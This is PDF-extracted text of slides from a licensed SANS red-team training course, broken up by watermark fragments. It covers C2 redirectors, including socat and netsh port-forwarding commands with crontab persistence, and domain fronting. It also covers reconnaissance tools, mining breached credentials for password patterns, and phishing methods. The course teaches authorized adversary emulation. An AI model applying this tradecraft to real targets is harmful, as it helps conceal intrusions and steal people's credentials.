© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1188

Attack Infrastructure: Redirectors

TM

090aff33bcb6e401ded410120bc9a268 • Redirectors are pivots used to separate communications between 26 ,2 02 0

a target and C2 servers • Should be thought of as “burnable” • Multiple redirectors can be used to obfuscate communications – socat port redirection on Linux

[email protected] Ap ril

crontab –e @reboot /usr/bin/socat TCP-LISTEN:443,fork TCP:10.10.10.10:443&

m

>

– netsh port redirection on Windows

o.

co

netsh interface portproxy add v4tov4 listenport=443 listenaddress=10.20.20.20 connectport=443 connectaddress=10.10.10.10

– Other options: iptables, Apache mod_rewrite, nginx, Domain Fronting SEC564 | Red Team Exercises and Adversary Emulation

103

ak

er

@ ya

ho

22829180 i< an

nm

Attack Infrastructure: Redirectors Use a redirector in front of every backend server. Redirectors provide obfuscation for the backend servers and can provide some advanced filtering options, depending on the redirector type, that can further hamper Blue Team investigations. ATT&CK calls redirectors multi-hop proxy which is a method of doing redirection.

ze

Lincoln Mazzei nc o

ln

M

az

Payload redirectors should be used in front of all servers hosting your social engineering payloads. Web redirectors fall into two major buckets: “Dumb pipe” and “filtering”. “Dumb pipe” redirectors (i.e. socat, iptables, netsh) take traffic received on one port and blindly proxy it to another IP and port. All connections are forwarded, regardless of what’s contained within the request. Filtering redirectors (i.e. Apache mod_rewrite and nginx) allow each request to be acted upon based on different attributes in the request, such as request URI or user agent. Filtering redirectors are often the better choice, but they do take longer to configure and can be difficult to set up if you are using a complex filtering ruleset.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

C2 redirection aims to obfuscate the backend C2 servers and potentially confuse the blue team from investigating the traffic. C2 redirection can use the same methods as payload redirection (“dumb pipe” and “filtering”), but you can also use Domain Fronting or third-party services as C2 redirectors. Support for the latter two options vary per post-exploitation framework, but they provide C2 traffic that is both difficult to detect and difficult to block. References: Multi-hop Proxy: https://attack.mitre.org/techniques/T1188/ Connection Proxy: https://attack.mitre.org/techniques/T1090/ https://redcanary.com/blog/4-technique-connection-proxy-t1090/ https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

103

© SANS Institute 2020 ATT&CK T1172

Attack Infrastructure: Domain Fronting

TM

090aff33bcb6e401ded410120bc9a268 • Technique developed to 26 ,2 02 0

bypass censorship • Leverages the HTTP Host Header (Application Layer) • Uses high reputation domains to redirect C2 traffic (Amazon, Google, Microsoft) • Highly resistant to blocking

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

104

ak

er

@ ya

ho

22829180 i< an

nm

Attack Infrastructure: Domain Fronting HTTP/1.1 introduced the concept of a "Host" header, which allows the server to host multiple virtual hosts which are selected based on the host name provided. The server will check the host name provided against a list of virtual hosts ii knows about and will pick the correct one to serve, if it doesn't know the specific host requested, it serves the default site. As HTTP is in the Application Layer of the OSI model, the previous layers have already established connectivity following standard setup: DNS to obtain IP address user requested via URL, IP Connectivity to system followed by TCP three-way handshake, and finally the GET request from the HTTP connection.

ln

M

az

ze

Lincoln Mazzei nc o

The Host Header can point anywhere and does not have to match the URL, DNS, or IP Address of the original request. When a site is set up on a Content Delivery Network (CDN), such as Amazon Cloudfront, Cloudflare, Microsoft Azure CDN or Google Cloud CDN, a CNAME record for the domain is set up to point at the CDN servers and something similar to a named vhost is set up on the CDN web servers so it can respond to the request. The setup is given an "origin" server which it pairs with the incoming domain, so it knows where to go to retrieve the actual content to serve. The hostname used for the network connection does not have to match the site requested and therefore you can use a hostname for one of the sites hosted by the CDN but then specify the host header for different one.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK References: https://attack.mitre.org/techniques/T1172/ https://digi.ninja/blog/domain_fronting.php https://www.bamsoftware.com/papers/fronting/

104

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK TA0021

Attack Infrastructure: Operational Security

TM

090aff33bcb6e401ded410120bc9a268 • Ensure all external systems are locked down so that only Red Team members can access administrative interfaces Ensure all payloads being generated can only be run from target environment Ensure all web properties do not include attributable information Ensure all external systems store all operating files using strong encryption Vet payloads and techniques for IoCs to aid blue team in lessons learned phase and aid in white cell deconfliction periods

26 ,2 02 0

• •

Ap ril

[email protected] m

>



o.

co



SEC564 | Red Team Exercises and Adversary Emulation

105

ak

er

@ ya

ho

22829180 ze

az

M

ln

• • • •

Lincoln Mazzei

Ensure all external systems are locked down so that only Red Team members can access administrative interfaces Ensure all payloads being generated can only be run from target environment Ensure all web properties do not include attributable information Ensure all external systems store all operating files using strong encryption Vet payloads and techniques for IoCs to aid blue team in lessons learned phase and aid in white cell deconfliction periods

nc o



i< an

nm

Attack Infrastructure: Operational Security Operational Security or OpSec will be covered throughout the course. As it pertains to the attack infrastructure, these are a few tips with a reference to many more:

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

References: https://attack.mitre.org/tactics/TA0021/ https://medium.com/@malcomvetter/responsible-red-teams-1c6209fd43cc https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

105

© SANS Institute 2020 Course Roadmap

Exercise Execution

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

106

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

106

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Red Team Exercise Execution

090aff33bcb6e401ded410120bc9a268 With good Threat Intelligence, Planning, and Project 26 ,2 02 0

Management, it is now time for the Red Team to Execute

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

107

ak

er

@ ya

ho

22829180 i< an

nm

Red Team Exercise Execution With good Threat Intelligence, Planning, and Project Management, it is now time for the Red Team to Execute. This course will follow the Unified Kill Chain by Paul Pols and the ATT&CK Framework for Exercise Execution.

Lincoln Mazzei nc o

ln

M

az

ze

• Reconnaissance: Researching, identifying and selecting targets using active or passive reconnaissance. • Weaponization: Coupling a remote access Trojan with an exploit into a deliverable payload. • Defense Evasion: Techniques an attacker may use for the purpose of evading detection or avoiding other defenses. • Delivery: Techniques resulting in the transmission of the payload to the targeted environment. • Exploitation: Techniques to exploit vulnerabilities in systems that may, among others, result in code execution. • Persistence: Any access, action or change to a system that gives an attacker persistent presence on the system. • Command and Control: Techniques that allow attackers to communicate with controlled systems within a target network. • Pivoting: Tunneling traffic through a controlled system to other systems that are not directly accessible. • Privilege Escalation: The result of techniques that provide an attacker with higher permissions on a system or network. • Discovery: Techniques that allow an attacker to gain knowledge about a system and its internal network. • Lateral Movement: Techniques that enable an adversary to access and control remote systems on a network. • Execution: Techniques that result in execution of attacker-controlled code on a local or remote system. • Credential Access: Techniques resulting in the access of, or control over, system, service or domain credentials. • Target Manipulation: Techniques aimed at manipulation of the target system to achieve the objective of the attack. • Collection: Techniques used to identify and gather information from a target network prior to exfiltration. • Exfiltration: Techniques that result or aid in an attacker removing files and information from a target network.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

Reference: https://www.csacademy.nl/images/scripties/2018/Paul-Pols---The-Unified-Kill-Chain.pdf

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

107

© SANS Institute 2020 Course Roadmap

Reconnaissance

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

108

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

108

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 PRE ATT&CK

Reconnaissance

TM

090aff33bcb6e401ded410120bc9a268 • Red Team fills in the gaps of 26 ,2 02 0

the Threat Intelligence • Reconnaissance includes understanding the target’s:

– Network architecture – IP space – Technology Solutions – Email format and infrastructure – Security procedures – People & Culture

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

109

ak

er

@ ya

ho

22829180 i< an

nm

Reconnaissance Often, the Threat Intelligence report, while valuable, may not include everything required to begin exercise execution, therefore the reconnaissance phase can be considered Red Team Planning and a first step of the Red Team Exercise Execution. This is an important step to obtain the Initial Foothold onto the target organization when emulating an External Adversary. The word reconnaissance is borrowed from its military use, where it refers to a mission into enemy territory to obtain information.

az

ze

Lincoln Mazzei

Network architecture: Domain names, DNS IP space: IP Addresses owned, live hosts Technology Solutions: Determine the technology used by the target (e.g. operating systems, servers, client applications, etc) Email format and infrastructure: Important for social engineering and if phishing will be leveraged. Does the target use a spam or email threat providers like ProofPoint? What security do they employ at the protocol level? Security procedures: What controls will Red Team need to bypass? People and Culture: Important for social engineering and if phishing will be leveraged

nc o

• • •

ln

M

Reconnaissance includes, among other things, understanding the target’s:

To :

ce

Li

• •

ns

ed



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK References: https://attack.mitre.org/tactics/pre/ https://attack.mitre.org/tactics/TA0015/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

109

© SANS Institute 2020 Passive Recon

090aff33bcb6e401ded410120bc9a268 Obtaining info about target without engaging with their systems Social Network Sites

26 ,2 02 0

Job Posting Sites

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

110

ak

er

@ ya

ho

22829180 i< an

nm

Passive Recon Passive Reconnaissance is the process of obtaining information about a target without engaging or probing the systems owned and operated by that target. Although unlikely that spidering a target website would result in the Blue Team detecting Red Team during the recon phase, Blue Team may go back later and look at all activity performed by Red Team IP Addresses. Therefore, avoid navigating to any infrastructure or application owned and operated by the target environment unless absolutely required. As most employees and Human Resources overshare, these are two main areas that will significantly help the Red Team passively learn more about the target.

M

az

ze

Lincoln Mazzei nc o

ln

Job Posting Sites Identifying the correct candidate for a job is very difficult; hiring managers and Human Resources/Staffing want to find the best fit for the job. One method to do that is by posting the job description, as detailed as possible, on multiple job posting sites. The more detailed the job posting, the higher chance to find the best candidate. These sites are ideal for Red Team members to perform passive recon and learn more about the target organization. Areas to focus on are technology and information security job descriptions.

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

Social Networking Sites Many people use social networking sites to stay up to date with personal life. However, many people also use social media to interact with companies or share work items with friends and connections. LinkedIn is a good starting point to learn where people work as people want to have accurate profiles of their professional brand. Although not exactly a social network site, it is a good idea to check other places where socialization happens, such as forums for technical products like network vendor forums (e.g. Cisco, CheckPoint) as well as code sharing sites like GitHub.

live

Tools that facilitate and automate passive recon •

110

theHarvester: A very simple, yet effective tool designed to be used in the early stages of a penetration test. Use it for open source intelligence gathering and helping to determine a company's external threat landscape on the internet. The tool gathers emails, names, subdomains, IPs, and URLs using multiple public data sources: https://github.com/laramies/theHarvester

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 •

Social Mapper: OSINT Social Media Mapping Tool, takes a list of names and images (or LinkedIn company name) and performs automated target searching across multiple social media sites. Not restricted by APIs as it instruments a browser using Selenium. Outputs reports to aid in correlating targets across sites. https://github.com/SpiderLabs/social_mapper Skiptracer: OSINT scraping framework, utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget. https://github.com/xillwillx/skiptracer ScrapedIn: A tool to scrape LinkedIn without API restrictions for data reconnaissance. https://github.com/dchrastil/ScrapedIn linkScrape: A LinkedIn user/company enumeration tool. https://github.com/test4a/linkScrape truffleHog: Searches through git repositories for secrets, digging deep into commit history and branches. https://github.com/dxa4481/truffleHog GitHarvester: This tool is used for harvesting information from GitHub like google dork. https://github.com/metac0rtex/GitHarvester Just-Metadata: A tool that gathers and analyzes metadata about IP addresses. It attempts to find relationships between systems within a large dataset. https://github.com/ChrisTruncer/Just-Metadata

• • • •

[email protected] m

>



Ap ril



26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

Reference: https://github.com/infosecn1nja/Red-Teaming-Toolkit#passive-intelligence-gathering

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

111

© SANS Institute 2020 ATT&CK T1255

Credentials

TM

090aff33bcb6e401ded410120bc9a268 Obtain email addresses, search for compromised credentials 26 ,2 02 0

• Obtain email addresses: – https://hunter.io/

• Search compromised credential sites • Get compromised credentials • Create wordlist

Ap ril

[email protected] >

CONSIDER THIS

m

People manually sync passwords across environments and/or use patterns to remember: Spring2019

o.

co

– Identify Patterns

SEC564 | Red Team Exercises and Adversary Emulation

112

ak

er

@ ya

ho

22829180 i< an

nm

Credentials Threat Intelligence may have provided Red Team with a list of target personnel and email addresses to target for social engineering. Those email addresses may be used to look up if the same account was used on other websites that have been breached. Many people use the work email address to sign up for sites that may have been compromised. Furthermore, they may manually sync passwords between sites or use a similar pattern. Search the email address on the sites or download the full Breach Compilation to search through. With just a few email addresses, it should be easy to determine the email syntax and derive other email addresses used at the target. Hunter.io allows searching for a domain and seeing all email addresses it has found. Other recon methods covered in this course will help as well.

nc o

ln

M

az

ze

Lincoln Mazzei

Consider This People manually sync passwords across environments and/or use patterns to remember the passwords more easily. Patterns can be CompanyName1 and CompanyName2 or Winter2018 and Spring2019. These patterns should be added to a word list for later stages of the attack.

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

ce

pwndb: A python command-line tool for searching leaked credentials using the Onion service with the same name. https://github.com/davidtavarez/pwndb/ pwnedOrNot: Uses haveibeenpwned v2 API to test email accounts and tries to find the password in Pastebin Dumps: https://github.com/thewhiteh4t/pwnedOrNot

Li



ns

Tools that facilitate and automate obtaining compromised credentials

live

References: https://attack.mitre.org/techniques/T1255/ https://hunter.io/ https://attack.mitre.org/techniques/T1078/ https://ghostproject.fr/ https://haveibeenpwned.com https://search.weleakinfo.com/search https://gist.github.com/scottlinux/9a3b11257ac575e4f71de811322ce6b3 112

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Active Recon

090aff33bcb6e401ded410120bc9a268 Obtaining info about a target by actively probing the system 26 ,2 02 0

• Spider Target Website • Google Hacking/Dorking • Interrogate DNS

[email protected] Ap ril

– MX Records – https://dnsdumpster.com/

CONSIDER THIS

• Vulnerability Scanning

m

>

Blue Team may not detect active recon but may go back and see what Red Team did once detected

o.

co

– Generally not performed during Red Team Exercises

SEC564 | Red Team Exercises and Adversary Emulation

113

ak

er

@ ya

ho

22829180 i< an

nm

Active Recon Active Reconnaissance is the process of obtaining information about a target by actively engaging and probing the systems owned and operated by that target. This can be as trivial as visiting the target website or spidering it with an automated tool to identify as much as possible about the organization. Google Dorking/Hacking is a great way to do this as well. Johnny Long created a list of useful Google searches, using search directives, to find vulnerable systems. He called each individual search a Google Dork, and the entire inventory of all these searches is known as the Google Hacking Database (GHDB). There are more than 1,000 different searches in the GHDB that can find several varieties of security flaws and related issues, all by simply searching Google. DNS is a core requirement for websites to function and may have very valuable information. Interrogate DNS using nslookup, dig, or online tools. For email recon, determine the MX records. Lastly, active recon may involve vulnerability scanning to identify live hosts, map the network topology, identify services running, etc. This is generally performed with a tool such as Nmap, Nessus, Nexpose, etc. but rarely used by Red Team. Most organizations doing Red Team Exercises should already have a good understanding of their technical vulnerabilities and a vulnerability management program.

nc o

ln

M

az

ze

Lincoln Mazzei

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Consider This Although unlikely that spidering a target website would result in the Blue Team detecting Red Team during the recon phase, Blue Team may go back later and look at all activity performed by Red Team IP Addresses. Therefore, when navigating to any infrastructure or application owned and operated by the target, use systems and controls that will not map back to Attack Infrastructure or can be attributable to the Red Team. Consider leveraging a VPN connection or TOR. Tools that facilitate and automate active recon • • •

live

SearchDiggity: Windows-based GUI supporting GHDB, Bing Hacking Database, DLP, Malware, and more: https://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/ Dnsrecon: A DNS Enumeration Script: https://github.com/darkoperator/dnsrecon Spoofcheck: A program that checks if a domain can be spoofed. The program checks SPF and DMARC records for weak configurations that allow spoofing: https://github.com/BishopFox/spoofcheck

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

113

© SANS Institute 2020 • •

AQUATONE: A set of tools for performing reconnaissance on domain names: https://github.com/michenriksen/aquatone FOCA: (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents its scans: https://github.com/ElevenPaths/FOCA Metagoofil: A tool for extracting metadata of public documents available in the target websites: https://github.com/laramies/metagoofil Nmap: Tool to discover hosts and services on target systems: https://github.com/nmap/nmap

• •

References: https://github.com/infosecn1nja/Red-Teaming-Toolkit#active-intelligence-gathering https://www.exploit-db.com/google-hacking-database https://dnsdumpster.com/

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

114

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Recon Frameworks

090aff33bcb6e401ded410120bc9a268 Frameworks automated passive and active reconnaissance 26 ,2 02 0

Maltego Recon-ng Spiderfoot Datasploit

Ap ril

[email protected] o.

co

m

>

• • • •

SEC564 | Red Team Exercises and Adversary Emulation

115

ak

er

@ ya

ho

22829180 i< an

nm

Recon Frameworks Many frameworks are available that automate the passive and active reconnaissance discussed in this course. We cover a few of the most used ones: Maltego, Recon-ng, Spiderfoot, and Datasploit.

Lincoln Mazzei ln

M

az

ze

Maltego Maltego is proprietary software used for open-source intelligence and forensics, developed by Paterva. Maltego focuses on providing a library of transforms for discovery of data from open sources, and visualizing that information in a graph format, suitable for link analysis and data mining.

nc o

Recon-ng Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built-in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly. Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Usage Guide for more information. Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for more information.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

115

© SANS Institute 2020 Spiderfoot Spiderfoot is an open source intelligence (OSINT) automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname, network subnet, ASN, email address or person's name. Spiderfoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target or defensively to identify what information your organization is freely providing for attackers to use against you.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Dataspolit Performs OSINT on a domain / email / username / phone and find out information from different sources. Correlate and collaborate the results, show them in a consolidated manner. Tries to find out credentials, api-keys, tokens, subdomains, domain history, legacy portals, etc. related to the target. Use specific script / launch automated OSINT for consolidated data. Performs Active Scans on collected data. Generates HTML, JSON reports along with text files.

Ap ril

[email protected] o.

co

m

>

References: Maltego: https://www.paterva.com/web7/downloads.php https://github.com/lanmaster53/recon-ng/ Spiderfoot: https://github.com/smicallef/spiderfoot Datasploit: https://github.com/DataSploit/datasploit theHarvester: https://github.com/laramies/theHarvester

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

116

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Social Engineering

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

117

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

117

© SANS Institute 2020 ATT&CK T1249

Social Engineering

TM

090aff33bcb6e401ded410120bc9a268 • Social engineering is exploiting weaknesses in human nature

26 ,2 02 0

– Email (phishing) – Telephone (vishing) – Text (smsishing) – Social Media (friending) – In-person

Ap ril

[email protected] o.

co

m

>

• Can be used for recon or obtaining initial access

SEC564 | Red Team Exercises and Adversary Emulation

118

ak

er

@ ya

ho

22829180 i< an

nm

Social Engineering Social engineering is defined as exploiting weaknesses in human nature. Red Team Exercises often rely on social engineering to support goals whether to obtain more information or to gain initial access. Social Engineering can be performed in the following methods:



ze

az

M

ln



Lincoln Mazzei

Email, also known as phishing, is where the attacker sends emails impersonating someone else to obtain information or convince the target to perform on action on the attacker’s behalf. Telephone, also known as vishing, is where the attacker calls the target to obtain more information about the target or organization. Text, also known, as Smishing, is where the attacker sends text, SMS, or MMS messages to the target to obtain more information or perform an action. Social Media: Friending or establishing a connection with the target via Social Media sites to build a relationship and obtain information. This may not be allowed by the Rules of Engagement but is often used by sophisticated malicious attackers. In-person is typically used to support physical breaches. May be leveraged at common areas, also known as watering holes, to listen to conversations or engage with a target in person.

nc o



ce

ns



ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

Li

References: https://attack.mitre.org/techniques/T1249/ https://attack.mitre.org/techniques/T1268/ https://attack.mitre.org/techniques/T1279/

live

SANS Course: SANS SEC567: Social Engineering for Penetration Testers https://www.sans.org/course/social-engineering-for-penetration-testers

118

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1268

Social Engineering: Adversary Emulation

TM

090aff33bcb6e401ded410120bc9a268 • Start by establishing a relation and gaining trust • Various attack methods

26 ,2 02 0

– Phishing email with link to credential theft site – Phishing email with malicious attachment (weaponized) – Phishing email to site hosting exploit or a payload – Phone calls to steal credentials

Ap ril

[email protected]

• Target as few as possible

o.

co

m

>

– Each email sent or phone call made is a chance to get caught – Burned email infrastructure takes time to rebuild (reputation)

• OPSEC: only target should be able to access your site SEC564 | Red Team Exercises and Adversary Emulation

119

ak

er

@ ya

ho

22829180 i< an

nm

Social Engineering: Adversary Emulation Red Team will most likely have to leverage social engineering via phishing as it is used by many adversaries. Social Engineering can be leveraged in various different ways. The best is to establish a relationship and gain trust with the target. From there, Red Team can setup the following types (as examples) of social engineering attacks:

ze

Lincoln Mazzei ln

M

az

Credential Theft: Enticing users to send their credentials Malicious attachment: A Word, Excel, PDF, or other document that runs executable code on the target Redirect to client-side exploit site: Enticing users to visit a location that hosts client-side exploit code Call the user and ask for credentials

nc o

• • • •

Operational Security Ensure only the target organization can access your social engineering infrastructure. Target as few people as possible as every email sent, or every phone call made is a chance to get caught. Recreating email infrastructure takes time due to gaining reputation.

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

There are many tools that can perform targeted phishing and credential theft sites.

Li

References: https://attack.mitre.org/techniques/T1249/ https://attack.mitre.org/techniques/T1268/ https://attack.mitre.org/techniques/T1279/ https://www.trustedsec.com/social-engineer-toolkit-set/ https://github.com/fireeye/ReelPhish/ https://github.com/ustayready/CredSniper https://github.com/fireeye/PwnAuth https://github.com/L4bF0x/PhishingPretexts https://github.com/drk1wi/Modlishka

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

119

© SANS Institute 2020 ATT&CK T1279

Social Engineering: Awareness Training

TM

090aff33bcb6e401ded410120bc9a268 • Red Team may test people for susceptibility to phishing 26 ,2 02 0

• Target entire population with a unique URL per person • Measure: – Who fell for the phish – Who reported the phish

[email protected] m co

o.

– King Phisher, FiercePhish, Go Phish – Phishline, KnowBe4, Wombat, Phishme, etc.

>

Ap ril

• Increase the sophistication level as percentage improves • Many tools/vendors available to do this:

SEC564 | Red Team Exercises and Adversary Emulation

120

ak

er

@ ya

ho

22829180 i< an

nm

Social Engineering: Awareness Training Red Team may also be tasked with running the social engineering program for awareness training given Red Team tests people and process. This type of social engineering campaign is to measure and track staff susceptibility to phishing. A unique email with a unique link/URL should be sent to each staff to determine who clicked on the link or who reported the phishing email correctly. There are many tools to do this in house as well as services available in Software as a Service models. These Red Team Exercises have different goals and metrics than adversary emulation phishing.

M

az

ze

Lincoln Mazzei nc o

ln

When phishing for awareness training, the general metrics are: • Who fell for the phish • Who reported the phish

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

References https://github.com/securestate/king-phisher https://github.com/Raikia/FiercePhish https://github.com/gophish/gophish https://www.phishingfrenzy.com/ https://www.barracuda.com/products/phishline

live

120

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Lab 1.3: Recon and Social Engineering

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

121

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

121

© SANS Institute 2020 Click1.3 To| Edit Master Title Style Lab Recon and Social Engineering

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Please work on the lab exercise Lab 1.3 | Recon and Social Engineering

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

122

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

122

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Weaponization

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

123

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

